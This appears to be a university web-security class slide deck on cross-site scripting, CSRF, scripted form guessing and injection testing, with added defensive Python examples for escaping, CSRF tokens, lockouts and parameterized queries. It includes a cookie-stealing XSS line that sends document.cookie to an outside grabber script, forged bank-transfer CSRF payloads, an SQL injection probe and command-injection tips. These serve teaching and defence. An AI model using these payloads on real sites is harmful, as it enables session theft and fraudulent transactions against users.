![Page 1: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/1.jpg)
WEB SECURITY WEEK 3
Computer Security Group
University of Texas at Dallas
Cross Site Scripting
Overview
Exploits the trust a browser places in a site by running code (usually JS) in the browser
Reflected: the user is tricked into running some code
  In a URL: site.com/?msg=<script>…</script>
  Pasted into the address bar
Stored: the malicious code is stored persistently on the compromised website
  Unfiltered comments
  SQL injection allowing user control where it was not intended
Payloads and Goals
Steal cookies
Open a hidden IFRAME
Spam advertisements
Redirect to another page
Clickjacking
Many more
Example Attack
Uses jQuery
```javascript
<script>$.get('www.mysite.com/grabber.php?c=' + document.cookie);</script>
```
A GET request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.
Example 1
http://10.176.169.7/web_demo/week3/main.php
Mitigation
Developers
  Don't allow users to post HTML
  Keep an eye out for places where attackers could modify what other people's browsers render
Users
  Use NoScript or a similar whitelisting plugin
  Don't click or paste a link with JavaScript in it
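The developer-side fix for the reflected case above is output encoding: whatever arrives in the msg parameter is rendered as text, never parsed as markup. The following is an added example, not code from the slides; the URL and the two render functions are constructed for the demonstration. It pulls msg out of a site.com-style URL and shows the page produced with and without escaping.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed sample URL in the shape of site.com/?msg=... from the slides.
SAMPLE_URL = "http://site.com/?msg=<script>alert(1)</script>"


def msg_from_url(url: str) -> str:
    """Return the msg query parameter of a URL (empty string if absent)."""
    query = parse_qs(urlparse(url).query)
    return query.get("msg", [""])[0]


def render_unsafe(msg: str) -> str:
    """Reflected XSS: the parameter is pasted straight into the HTML body."""
    return f"<p>You said: {msg}</p>"


def render_safe(msg: str) -> str:
    """Output encoding for an HTML body context: < > & " ' become entities,
    so the browser displays the characters instead of executing them."""
    return f"<p>You said: {html.escape(msg, quote=True)}</p>"


def contains_live_tag(page: str) -> bool:
    """Crude illustration check: does a raw '<script' survive in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    msg = msg_from_url(SAMPLE_URL)
    print("unsafe:", render_unsafe(msg))
    print("safe:  ", render_safe(msg))
```

html.escape is the right tool only when the value lands in HTML body or attribute text; a value placed inside a script block, a URL, or a CSS string needs the encoding for that context, which is why template engines that auto-escape per context are preferred over hand-rolled escaping.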
Challenge
http://10.176.169.7/web_demo/week3/challenge1/main.php
Cross-Site Request Forgery (CSRF)
Overview
Similar to XSS
Exploits the trust that servers place in browsers
It's very difficult for a web server to know whether a request your computer sent was sent with your knowledge or approval
Different from XSS, but XSS is often an attack vector for CSRF
Example Attack
Images
```html
<img src="bank.com/transfer.php?to=me&amount=1000000" />
```
XSS
```javascript
$.post('bank.com/transfer.php', {to: 'me', amount: 1000000});
```
Mitigation
Only trust requests from your domain
Use CSRF protection tokens, included in many web frameworks
Use the appropriate HTTP method; don't use GET for something that modifies data
Not much to do as a user
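The three developer mitigations above combine into one server-side check on the transfer endpoint. This is an added example, not code from the slides or any framework: the origin bank.example, the session layout and the handle_transfer signature are assumptions chosen for the demonstration. It refuses the GET that an img tag can issue, rejects requests whose Origin/Referer is not our own site, and requires a per-session token that a page on another origin cannot read.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import urlparse

# Assumed origin of the site being defended (hypothetical, not from the slides).
SITE_ORIGIN = "https://bank.example"


def new_session(user: str) -> Dict[str, str]:
    """Start a session and bind an unguessable CSRF token to it."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}


def transfer_form(session: Dict[str, str]) -> str:
    """Our own form embeds the token as a hidden field (synchronizer token pattern)."""
    return (
        '<form method="POST" action="/transfer.php">'
        f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def same_origin(header_value: str) -> bool:
    """True if the scheme and host of an Origin/Referer value equal our origin."""
    parsed = urlparse(header_value)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def handle_transfer(session: Dict[str, str], method: str,
                    headers: Dict[str, str], form: Dict[str, str]) -> str:
    """Checks a state-changing request; returns an HTTP-style status line."""
    # 1. GET must never change state: an <img src=...> can only issue a GET.
    if method != "POST":
        return "405 method not allowed"
    # 2. Only trust requests the browser attributes to our own domain.
    #    Browsers attach Origin to cross-site POSTs; fail closed when neither
    #    Origin nor Referer is present.
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if not same_origin(origin):
        return "403 cross-origin request refused"
    # 3. The submitted token must equal the one bound to this session.
    #    compare_digest keeps the comparison constant-time; bytes avoid the
    #    ASCII-only restriction on str inputs.
    submitted = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(submitted, session["csrf_token"].encode()):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    s = new_session("alice")
    print(handle_transfer(s, "GET", {}, {"to": "me", "amount": "1000000"}))
    print(handle_transfer(s, "POST", {"Origin": "https://evil.example"},
                          {"to": "me", "amount": "1000000"}))
    print(handle_transfer(s, "POST", {"Origin": SITE_ORIGIN},
                          {"csrf_token": s["csrf_token"], "to": "bob", "amount": "10"}))
```

Note what the token does not cover: the slide's XSS variant runs inside the site's own origin, so a script there can read the hidden field and submit a valid token. CSRF tokens defend against forged cross-site requests; the XSS itself has to be fixed separately.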
Python for Web
Python Web Scripts
Python is a powerful scripting language. Some web problems are very repetitive. Use the libraries urllib and urllib2.
Example Code
```python
# Python 2: urllib2 does not exist in Python 3 (there it is urllib.request).
import urllib
import urllib2

url = 'http://www.someserver.com/cgi-bin/register.cgi'
values = {'name': 'Michael Foord',
          'location': 'Northampton',
          'language': 'Python'}

data = urllib.urlencode(values)    # form-encode the fields: name=Michael+Foord&...
req = urllib2.Request(url, data)   # supplying a body makes this a POST
response = urllib2.urlopen(req)
the_page = response.read()         # the server's response body
```
Example 2
http://10.176.169.7/web_demo/week3/guess.php
Mitigation
Captchas
Lockouts after several attempts
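A scripted guesser of the kind the urllib example enables is what the lockout is meant to stop. The following is an added example, not code from the slides: a small guard that counts failed attempts per account inside a sliding window and refuses further guesses for a lockout period. The credential store, the LoginGuard class and its thresholds are constructed for the demonstration; the current time is passed in so the window behaviour can be exercised without waiting.

```python
import hmac
from collections import defaultdict, deque
from typing import Deque, Dict

# Constructed credential store for the demo. A real application stores salted
# password hashes; the lockout logic below does not depend on that choice.
CREDENTIALS = {"alice": "correct horse battery staple"}


def check_password(account: str, password: str) -> bool:
    """Constant-time comparison against the stored credential (False for unknown accounts)."""
    stored = CREDENTIALS.get(account, "")
    return bool(stored) and hmac.compare_digest(stored.encode(), password.encode())


class LoginGuard:
    """Refuse guesses for an account after max_failures failures within window seconds."""

    def __init__(self, max_failures: int = 5, window: float = 300, lockout: float = 900):
        self.max_failures = max_failures
        self.window = window          # seconds over which failures are counted
        self.lockout = lockout        # seconds the account stays locked
        self._failures: Dict[str, Deque[float]] = defaultdict(deque)
        self._locked_until: Dict[str, float] = {}

    def is_locked(self, account: str, now: float) -> bool:
        until = self._locked_until.get(account)
        if until is None:
            return False
        if now >= until:              # lockout expired: reset the counters
            del self._locked_until[account]
            self._failures[account].clear()
            return False
        return True

    def attempt(self, account: str, password: str, now: float) -> str:
        """Return 'ok', 'wrong' or 'locked'; `now` is injected for testability."""
        if self.is_locked(account, now):
            return "locked"           # refused before the password is even checked
        if check_password(account, password):
            self._failures[account].clear()
            return "ok"
        recent = self._failures[account]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()          # drop failures that fell out of the window
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
            return "locked"
        return "wrong"


if __name__ == "__main__":
    guard = LoginGuard(max_failures=3, window=60, lockout=120)
    for t, guess in enumerate(["a", "b", "c", "correct horse battery staple"]):
        print(t, guard.attempt("alice", guess, t))
```

Per-account lockout has a cost: while the lockout runs, the legitimate owner is also refused, so an attacker who wants to annoy a user can trigger it on purpose. Counting per source address as well, and pairing the lockout with the captcha on the same slide, keeps the guessing rate down without letting one party lock another out indefinitely.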
Challenge 2
http://10.176.169.7/web_demo/week3/challenge2/guess.php
General Tips
Look at Requests!
Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, Burp Suite, etc.
The idea is to find things we can alter
The goal is to invalidate the trust that the developer put in us
Inject Everything
If your data goes into a database query, try SQL injection
If you think it’s piping your input into a program, try command injection via && and the like
If it looks like it’s rendering HTML, try some JavaScript
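Each item on this checklist has a matching developer-side fix, and the first two are worth seeing side by side. The following is an added example, not code from the slides: for the database case it puts a concatenated query next to a parameterized one over a constructed in-memory SQLite table, and for the program case it contrasts a shell string built from user input with an allowlisted argv list passed without a shell. The table, the user values, HOST_RE and the function names are constructed for the demonstration; the HTML case is the output-encoding question from the XSS section.

```python
import re
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table with two users and their secrets."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con


def lookup_unsafe(con: sqlite3.Connection, name: str) -> List[Tuple[str]]:
    """Concatenation: the caller's text becomes part of the SQL statement."""
    return con.execute(f"SELECT secret FROM users WHERE name = '{name}'").fetchall()


def lookup_safe(con: sqlite3.Connection, name: str) -> List[Tuple[str]]:
    """Parameterized: the driver binds name as data; it can never alter the query."""
    return con.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()


# Allowlist for a hostname argument: letters, digits, dots and hyphens only.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def ping_command_unsafe(host: str) -> str:
    """A shell command string; run with shell=True the shell parses && and ; in host."""
    return f"ping -c 1 {host}"


def ping_command_safe(host: str) -> List[str]:
    """Validate the host, then return an argv list for subprocess.run without a shell,
    so the whole value reaches ping as one argument whatever it contains."""
    if not HOST_RE.match(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    con = make_db()
    probe = "x' OR '1'='1"
    print("unsafe rows:", lookup_unsafe(con, probe))   # every secret in the table
    print("safe rows:  ", lookup_safe(con, probe))     # no such user
    print(ping_command_safe("example.com"))
```

The SQL fix needs no validation of the name at all; binding does the work. The command case gets both controls because even with an argv list, a value like "-c 9999" would still be read by ping as an option, and the allowlist stops that too.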
Questions?